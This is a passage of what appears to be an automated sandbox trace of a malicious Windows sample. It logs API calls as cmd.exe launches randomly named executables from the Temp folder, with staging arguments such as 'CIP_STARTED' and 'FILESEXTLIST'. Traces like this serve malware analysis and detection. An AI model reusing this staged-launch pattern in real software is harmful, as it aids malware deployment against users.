lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.215] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.216] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.217] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.218] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.240] _close (_FileHandle=4) returned 0 [0115.240] FindNextFileW (in: hFindFile=0x80f68, lpFindFileData=0x2aee48 | out: lpFindFileData=0x2aee48) returned 0 [0115.241] GetLastError () returned 0x12 [0115.241] FindClose (in: hFindFile=0x80f68 | out: hFindFile=0x80f68) returned 1 [0115.241] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0115.278] _close (_FileHandle=3) returned 0 [0115.278] GetConsoleTitleW (in: lpConsoleTitle=0x2af2e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.278] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe\"")) returned 0xffffffff [0115.278] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0115.278] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0115.278] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0115.278] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0115.278] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0115.278] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0115.278] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0115.279] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0115.279] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0115.279] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0115.279] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0115.279] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0115.279] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0115.279] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0115.279] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0115.279] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0115.279] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0115.279] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0115.279] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0115.279] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0115.279] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0115.279] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0115.279] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0115.279] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0115.279] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0115.279] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0115.279] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0115.279] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0115.279] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0115.279] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0115.279] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0115.279] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0115.279] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0115.279] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0115.279] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0115.279] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0115.279] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0115.279] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0115.279] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0115.279] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0115.280] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0115.280] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0115.280] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0115.280] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0115.280] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0115.280] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0115.280] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0115.280] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0115.280] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0115.280] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0115.280] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0115.280] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0115.280] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0115.280] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0115.280] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0115.280] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0115.280] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0115.280] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0115.280] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0115.280] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0115.280] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0115.280] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0115.280] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0115.280] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0115.280] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0115.280] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0115.280] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0115.280] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0115.280] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0115.280] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0115.280] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0115.280] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0115.280] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0115.281] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0115.281] SetErrorMode (uMode=0x0) returned 0x0 [0115.281] SetErrorMode (uMode=0x1) returned 0x0 [0115.281] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x904c0, lpFilePart=0x2aee04 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x2aee04*="Temp") returned 0x23 [0115.281] SetErrorMode (uMode=0x0) returned 0x1 [0115.281] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0115.281] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0115.285] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.285] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", fInfoLevelId=0x1, lpFindFileData=0x2aeba0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeba0) returned 0x80f68 [0115.285] FindClose (in: hFindFile=0x80f68 | out: hFindFile=0x80f68) returned 1 [0115.285] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0115.285] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0115.285] GetConsoleTitleW (in: lpConsoleTitle=0x2af078, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0115.285] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aef00, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aefc8 | out: lpAttributeList=0x2aef00, lpSize=0x2aefc8) returned 1 [0115.285] UpdateProcThreadAttribute (in: lpAttributeList=0x2aef00, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aefc0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aef00, lpPreviousValue=0x0) returned 1 [0115.285] GetStartupInfoW (in: lpStartupInfo=0x2aeebc | out: lpStartupInfo=0x2aeebc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0115.286] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0115.287] lstrcmpW (lpString1="\\w588H5dN.exe", lpString2="\\XCOPY.EXE") returned -1 [0115.288] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef5c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aefa8 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessInformation=0x2aefa8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe10, dwThreadId=0xe14)) returned 1 [0115.645] CloseHandle (hObject=0x4c) returned 1 [0115.645] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.645] GetEnvironmentStringsW () returned 0x92cf8* [0115.645] FreeEnvironmentStringsW (penv=0x92cf8) returned 1 [0115.645] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0117.138] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aee9c | out: lpExitCode=0x2aee9c*=0x0) returned 1 [0117.138] CloseHandle (hObject=0x50) returned 1 [0117.139] _vsnwprintf (in: _Buffer=0x2aefe4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aeea8 | out: _Buffer="00000000") returned 8 [0117.139] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0117.139] GetEnvironmentStringsW () returned 0x92480* [0117.139] FreeEnvironmentStringsW (penv=0x92480) returned 1 [0117.139] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0117.139] GetEnvironmentStringsW () returned 0x92480* [0117.139] FreeEnvironmentStringsW (penv=0x92480) returned 1 [0117.139] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aef00 | out: lpAttributeList=0x2aef00) [0117.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.139] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.139] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.139] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.139] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.139] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.139] SetConsoleInputExeNameW () returned 0x1 [0117.140] GetConsoleOutputCP () returned 0x1b5 [0117.140] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.140] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.140] exit (_Code=0) Process: id = "46" image_name = "gym4nxcu.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe" page_root = "0x7ea16760" os_pid = "0xdb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0xd44" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7443 start_va = 0x10000 